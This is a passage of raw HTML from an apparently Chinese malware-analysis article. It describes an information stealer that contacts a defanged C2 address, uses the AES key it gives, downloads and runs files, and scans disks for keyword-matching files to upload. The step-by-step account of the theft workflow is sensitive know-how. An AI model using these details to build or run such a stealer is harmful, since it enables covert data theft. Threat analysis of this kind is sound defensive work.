0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本采用异步的方式进行通信和执行任务。</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2850574712643678" data-w="870" style="width: 553.74px;height: 157.8px;" src="https://wechat2rss.xlab.app/img-proxy/?k=bbf4a7ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKRaQh7UKCB5fOADcJKKvfMibngUefOib0CYtRxVKrwpVuefVxLSQyTNrTfT5VMZia5mOgwdic9f20iamibzYAMibvazwGa7yC6UBzElQ%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou1sed" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本连接C2:</span></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1hbs"><a href="https://151.236.4[.]164:5010/get_sync_hash_table/(AES加密的计算机名_用户名)" target="_blank">https://151.236.4[.]164:5010/get_sync_hash_table/(AES加密的计算机名_用户名)</a></span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6333333333333333" data-w="780" style="width: 553.74px;height: 350.74px;" src="https://wechat2rss.xlab.app/img-proxy/?k=26968dea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJuhZekpahZraibj3JNZ63Yn5XzJ4DUMOW2MvescCsFhNu3AibAIbv1lib92iaI3gGcwL6rcMgaJQ9Zbx2NEI2zAo5FwKposE5NxzY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1kfd">AES key：</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgouoid">8802304DE46385A3672730C3539BC25B38930077AE9D9FF46E05D63409DFBCBB</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3609467455621302" data-w="845" style="width: 553.74px;height: 199.87px;" src="https://wechat2rss.xlab.app/img-proxy/?k=8576857b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJjpE3gHJy3iaAFibibDSzkTBGIic6DllEosHYFqrQotegiapbymE2IofICNaGJoMRQy7BbsObEQuUzc7utkyETXhZFTHcf9o4Qvmns%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou199b" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">4）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本C2返回的数据为json格式，样本解析其中的file_hashes字段，获取其中的哈希列表</span></span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.44607329842931936" data-w="955" style="width: 553.74px;height: 247px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e64cec9f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKPZzd59ZqfPFzfM3yfC355x5EkVXVq7PDHK7ALrYIgx39Mg3MmfIRU4ic3FXL4QyhPKNP9SPmMdyU5C8UtlicmVmdUB2pmmAyibE%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgouai2" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">5）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本创建一个异步任务，用于从C2下载文件。样本首先会初始化一个计时器，定时器设为34秒。</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5492753623188406" data-w="690" style="width: 553.74px;height: 304.14px;" src="https://wechat2rss.xlab.app/img-proxy/?k=9894fc70&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLXFVia5IJltTzX9L5uvqiaialtkicrWjTZdoRHIYWZ0CQnwbZZhhRIoZWdROVa8XCdLnfARhYQugzJIsv4061gicTcpz8IN511vNc4%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span data-remoteid="" data-asynid="" src="http://mmbiz.qpic.cn/mmbiz_png/Emmib7pWXrXLnDZgRpDDzV70QpuZ5niaMVWcq7MvYpYSAuiay5Ociakdg918oViafkhjto9KFzJEnn3DBtJoRKiaSDl8MEtZeeEcIc0ZDzz8VbSEM/0?wx_fmt=png" data-src="" align="" alt="" border="" class="rich_pages wxw-img" data-ratio="0.5178791615289766" data-s="" data-type="" data-w="811" aria-label="" aria-braillelabel="" aria-description="" height="" hspace="" ismap="" opacity="" sizes="" title="" type="" usemap="" vspace="" width="" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="" data-retry="" mpa-font-style="mo19dgou238j" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本下载文件，保存到当前的工作路径中。并执行。</span></span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5178791615289766" data-w="811" style="width: 553.74px;height: 286.8px;" src="https://wechat2rss.xlab.app/img-proxy/?k=97aa0bcc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLnDZgRpDDzV70QpuZ5niaMVWcq7MvYpYSAuiay5Ociakdg918oViafkhjto9KFzJEnn3DBtJoRKiaSDl8MEtZeeEcIc0ZDzz8VbSEM%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou18wh" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">6）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本执行一个异步任务，用于监测存储设备变更情况。判断存储设备（如：u盘、硬盘等）拔插行为。如果设备出现了数量变化，就暂停计时器。</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5238095238095238" data-w="630" style="width: 553.74px;height: 290.07px;" src="https://wechat2rss.xlab.app/img-proxy/?k=b0094c84&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJoaAz57hIw0BTa8YcD25DCQbiaKyHeP6micfB2InkTicjibYUuub9MQnulMKS3zMNkAQ76TYF8pXjEXUheoJJEXd2xqtgOTKaUiaJU%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgour30" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">7）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本通过连接C2，获取某类存储的同步优先级(如SSD、HDD）、获取特定存储的实际同步优先级(如：C盘)、获取关注的敏感词、获取传输任务数量。</span></span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.43859649122807015" data-w="855" style="width: 553.74px;height: 242.87px;" src="https://wechat2rss.xlab.app/img-proxy/?k=874c8a0f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKd3xhnz7dIT5N9bDWZtVs0Bk5g0iaZ9uhakL1KNhibx9mGrhEFyVodzkcS5G6JstTLnQOTN32F31IeXucrb4ohHZLmJzzObGwPg%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1bo8">之后就是启动计时器，根据C2传来的配置进行更新，将当前的任务队列进行更新。随后就进入到窃密工作。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5945945945945946" data-w="740" style="width: 553.74px;height: 329.27px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7a6ab29d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLZF3Ne2nYb2iax4aPeyVUJV49TQ5A2icBHU5QeaicRVQibrqJHSNEEtGzyLODkaicmibC4qAuaSOibrhpue6b3XXmSeWxygaZ2icXcbcA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgouz0j">样本根据任务队列配置的优先级，进行路径或磁盘扫描。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2679900744416873" data-w="806" style="width: 553.74px;height: 148.4px;" src="https://wechat2rss.xlab.app/img-proxy/?k=dcb90fd5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJESt5w37QADIxZ1LVrHoSszaydibCqJaqYFHJCtiaha6C1utsZmfQDqlfZZmEwstLNt8YMJdMnfzC584XqHQvaCvMdjNcvUoyJc%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou217b">扫描过程中，会将含有关键词的文件加入到文件列表中。</span><o:page></o:page></p><p data-remoteid="" data-asynid="" src="http://mmbiz.qpic.cn/mmbiz_png/Emmib7pWXrXJm5BsHfQv3mDE5CrPjw4GJ53P4nDO5BHkjScibl9ply8fmU7rfhdHVQ04TcCkhpgFGNzfggTyrRibEicjt9ZkyGwiaeqS31Y1t1VY/0?wx_fmt=png" data-src="" align="" alt="" border="" class="rich_pages wxw-img" data-ratio="0.46125" data-s="" data-type="" data-w="800" aria-label="" aria-braillelabel="" aria-description="" height="" hspace="" ismap="" opacity="" sizes="" title="" type="" usemap="" vspace="" width="" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="" data-retry="" style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3188405797101449" data-w="690" style="width: 553.74px;height: 176.54px;" src="https://wechat2rss.xlab.app/img-proxy/?k=90218dcc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJoHrfxsquFyXcZOjMfOXbWaNlbaf7e1bbsamQluwUbrF2Ih4oJuiayk52ZXUyI5m85oEryIrRricDkVknWVPxWXP6pYsYdoMB48%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou46j">根据文件列表中的数量，挨个进行文件异步传输。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.46125" data-w="800" style="width: 553.74px;height: 255.4px;" src="https://wechat2rss.xlab.app/img-proxy/?k=ae9b58a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJm5BsHfQv3mDE5CrPjw4GJ53P4nDO5BHkjScibl9ply8fmU7rfhdHVQ04TcCkhpgFGNzfggTyrRibEicjt9ZkyGwiaeqS31Y1t1VY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" 